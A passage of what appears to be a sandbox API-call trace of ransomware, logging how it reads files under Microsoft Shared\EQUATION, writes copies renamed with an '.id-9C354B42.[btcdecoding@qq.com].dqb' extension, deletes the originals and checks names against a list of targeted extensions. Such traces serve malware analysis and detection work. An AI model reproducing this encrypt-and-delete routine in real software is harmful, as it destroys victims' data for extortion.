Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.160] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.161] lstrlenW (lpString=".doc") returned 4 [0051.161] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString=".docx") returned 5 [0051.161] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0051.161] lstrlenW (lpString=".pdf") returned 4 [0051.161] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString=".xls") returned 4 [0051.161] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString=".xlsx") returned 5 [0051.161] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0051.161] lstrlenW (lpString=".ppt") returned 4 [0051.161] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.161] lstrlenW (lpString=".zip") returned 4 [0051.161] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString=".rar") returned 4 [0051.161] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.161] lstrlenW (lpString=".bz2") returned 4 [0051.161] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.161] lstrlenW (lpString=".7z") returned 3 [0051.161] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.161] lstrlenW (lpString=".dbf") returned 4 [0051.161] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.161] lstrlenW (lpString=".1cd") returned 4 [0051.161] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".jpg") returned 4 [0051.162] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".doc") returned 4 [0051.162] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString=".docx") returned 5 [0051.162] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0051.162] lstrlenW (lpString=".pdf") returned 4 [0051.162] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString=".xls") returned 4 [0051.162] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString=".xlsx") returned 5 [0051.162] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0051.162] lstrlenW (lpString=".ppt") returned 4 [0051.162] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".zip") returned 4 [0051.162] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString=".rar") returned 4 [0051.162] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.162] lstrlenW (lpString=".bz2") returned 4 [0051.162] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.162] lstrlenW (lpString=".7z") returned 3 [0051.162] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".dbf") returned 4 [0051.162] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".1cd") returned 4 [0051.162] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0051.162] lstrlenW (lpString=".jpg") returned 4 [0051.162] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.163] lstrcmpiW (lpString1=".CNT", lpString2=".dqb") returned -1 [0051.163] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0051.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.370] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=2557) returned 1 [0051.370] CloseHandle (hObject=0x1dc) returned 1 [0051.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20 [0051.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.370] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.370] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.370] GetLastError () returned 0x0 [0051.370] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x9fd, lpOverlapped=0x0) returned 1 [0051.373] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0051.374] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.374] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.374] SetEndOfFile (hFile=0x228) returned 1 [0051.374] CloseHandle (hObject=0x228) returned 1 [0051.374] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.374] SetEndOfFile (hFile=0x1dc) returned 1 [0051.375] CloseHandle (hObject=0x1dc) returned 1 [0051.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.375] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString=".doc") returned 4 [0051.376] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString=".docx") returned 5 [0051.376] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0051.376] lstrlenW (lpString=".pdf") returned 4 [0051.376] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString=".xls") returned 4 [0051.376] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString=".xlsx") returned 5 [0051.376] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0051.376] lstrlenW (lpString=".ppt") returned 4 [0051.376] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString=".zip") returned 4 [0051.376] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString=".rar") returned 4 [0051.376] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString=".bz2") returned 4 [0051.376] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0051.376] lstrlenW (lpString=".7z") returned 3 [0051.376] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString=".dbf") returned 4 [0051.376] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString=".1cd") returned 4 [0051.376] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.376] lstrlenW (lpString=".jpg") returned 4 [0051.376] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString=".doc") returned 4 [0051.377] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString=".docx") returned 5 [0051.377] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0051.377] lstrlenW (lpString=".pdf") returned 4 [0051.377] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString=".xls") returned 4 [0051.377] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString=".xlsx") returned 5 [0051.377] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0051.377] lstrlenW (lpString=".ppt") returned 4 [0051.377] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString=".zip") returned 4 [0051.377] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString=".rar") returned 4 [0051.377] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString=".bz2") returned 4 [0051.377] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0051.377] lstrlenW (lpString=".7z") returned 3 [0051.377] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString=".dbf") returned 4 [0051.377] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString=".1cd") returned 4 [0051.377] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.377] lstrlenW (lpString=".jpg") returned 4 [0051.377] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0051.378] lstrcmpiW (lpString1=".EXE", lpString2=".dqb") returned 1 [0051.378] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0051.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.378] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=543304) returned 1 [0051.378] CloseHandle (hObject=0x1dc) returned 1 [0051.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20 [0051.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.381] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.381] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.381] GetLastError () returned 0x0 [0051.381] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x84a48, lpOverlapped=0x0) returned 1 [0051.432] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x84a50, lpOverlapped=0x0) returned 1 [0051.440] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.440] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.440] SetEndOfFile (hFile=0x228) returned 1 [0051.440] CloseHandle (hObject=0x228) returned 1 [0051.441] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.441] SetEndOfFile (hFile=0x1dc) returned 1 [0051.445] CloseHandle (hObject=0x1dc) returned 1 [0051.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.446] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1 [0051.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.446] lstrlenW (lpString=".doc") returned 4 [0051.446] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.446] lstrlenW (lpString=".docx") returned 5 [0051.446] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0051.446] lstrlenW (lpString=".pdf") returned 4 [0051.446] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.446] lstrlenW (lpString=".xls") returned 4 [0051.446] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.446] lstrlenW (lpString=".xlsx") returned 5 [0051.446] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0051.446] lstrlenW (lpString=".ppt") returned 4 [0051.446] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.446] lstrlenW (lpString=".zip") returned 4 [0051.446] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.446] lstrlenW (lpString=".rar") returned 4 [0051.446] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.446] lstrlenW (lpString=".bz2") returned 4 [0051.446] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.447] lstrlenW (lpString=".7z") returned 3 [0051.447] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString=".dbf") returned 4 [0051.447] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString=".1cd") returned 4 [0051.447] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString=".jpg") returned 4 [0051.447] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString=".doc") returned 4 [0051.447] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.447] lstrlenW (lpString=".docx") returned 5 [0051.447] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0051.447] lstrlenW (lpString=".pdf") returned 4 [0051.447] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString=".xls") returned 4 [0051.447] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString=".xlsx") returned 5 [0051.447] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0051.447] lstrlenW (lpString=".ppt") returned 4 [0051.447] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.447] lstrlenW (lpString=".zip") returned 4 [0051.447] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString=".rar") returned 4 [0051.447] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.447] lstrlenW (lpString=".bz2") returned 4 [0051.447] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.447] lstrlenW (lpString=".7z") returned 3 [0051.447] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.448] lstrlenW (lpString=".dbf") returned 4 [0051.448] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.448] lstrlenW (lpString=".1cd") returned 4 [0051.448] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0051.448] lstrlenW (lpString=".jpg") returned 4 [0051.448] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.448] lstrcmpiW (lpString1=".manifest", lpString2=".dqb") returned 1 [0051.448] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0051.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.448] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=566) returned 1 [0051.448] CloseHandle (hObject=0x1dc) returned 1 [0051.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20 [0051.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.449] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.449] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.449] GetLastError () returned 0x0 [0051.449] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x236, lpOverlapped=0x0) returned 1 [0051.481] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x240, lpOverlapped=0x0) returned 1 [0051.482] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.482] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xfe, lpOverlapped=0x0) returned 1 [0051.482] SetEndOfFile (hFile=0x228) returned 1 [0051.484] CloseHandle (hObject=0x228) returned 1 [0051.485] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.485] SetEndOfFile (hFile=0x1dc) returned 1 [0051.485] CloseHandle (hObject=0x1dc) returned 1 [0051.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.486] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0051.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.486] lstrlenW (lpString=".doc") returned 4 